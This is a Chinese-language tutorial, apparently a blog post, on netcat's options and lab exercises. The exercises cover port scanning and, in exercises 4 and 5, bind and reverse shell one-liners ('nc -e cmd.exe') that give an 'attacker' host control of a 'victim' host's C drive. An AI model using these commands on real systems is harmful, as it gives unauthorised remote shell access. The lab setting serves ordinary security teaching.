NC的基本使用

NCnetcat的缩写被誉为网络安全界的‘瑞士军刀’通过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立起需要的几乎所有类型的网络连接

nc [-options] hostname port[s] [ports] …

序号代码作用
01-d在后台运行
02-e prog程序重定向,一旦连接,就执行绑定的程序(比较危险)
03-g源路由跳跃点,不超过八次
04-G源路由指示器4,8,12,…
05-h帮助信息
06-i secs延迟时间设置,端口扫描时使用
07-l监听方式,等待连入。连接完成后,结束监听
08-L监听方式,等待连入。连接完成后,继续监听
09-n以数字形式表示的IP地址
10-o file指定要传送的16进制代码
11-P port指定本地的端口号
12-r随意指定本地0或远程端口号
13-s addr本地的源地址
14-t以telnet形式应答入站请求
15-uUDP方式
16-v显示详细信息
17-w指定超时的时间
18-zI/O模式,扫描时使用

如:
1.应用了http/1.1 应用了GET方法

  • 将nc命令复制到c盘根下
  • 进入dos模式并退到根下
  • 打入nc -l -p 80:监控80端口的进入情况
  • 输入本机的IP地址或127.0.0.1使用80端口

2.连接80端口

  • 进入dos并退入跟下
  • 打上nc -l -p 80:监控80端口的进入情况
  • 再开启一个dos telnet本机ip 80或127.0.0.1 80查看联动

3.扫描远程主机192.168.0.103的80到445所有端口
的开放情况

格式:nc -nvv -w2 -z 192.168.0.103 80-445
4. 正向连接:攻击机192.168.0.100,被攻击机192.168.0.103
任务:通过80端口将攻击机192.168.0.100正向连接到被攻击机192.168.0.103上,并对被攻击机的C盘实时操作。
步骤1 被攻击机192.168.0.103上绑定shell到80端口。
格式:nc -vv –l –p 80 –e cmd.exe
步骤2 攻击机192.168.0.100通过80端口连接到主机192.168.0.103并获得远程主机的shell。
格式:nc 192.168.0.103 80
实训5反向连接:攻击机192.168.0.100,被攻击机192.168.0.103
任务:通过8080端口从攻击机192.168.0.100上反向连接到被攻击机192.168.0.103上,并对被攻击机的C盘实时操作。
步骤1 攻击机192.168.0.100对自己的8080端口进行监控。
格式:nc -vv –l –p 8080
步骤2 被攻击机192.168.0.103将shell绑定到攻击机的8080端口,从而攻击机反向获得被攻击机的shell。
格式:nc –e cmd.exe 192.168.0.100 8080

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值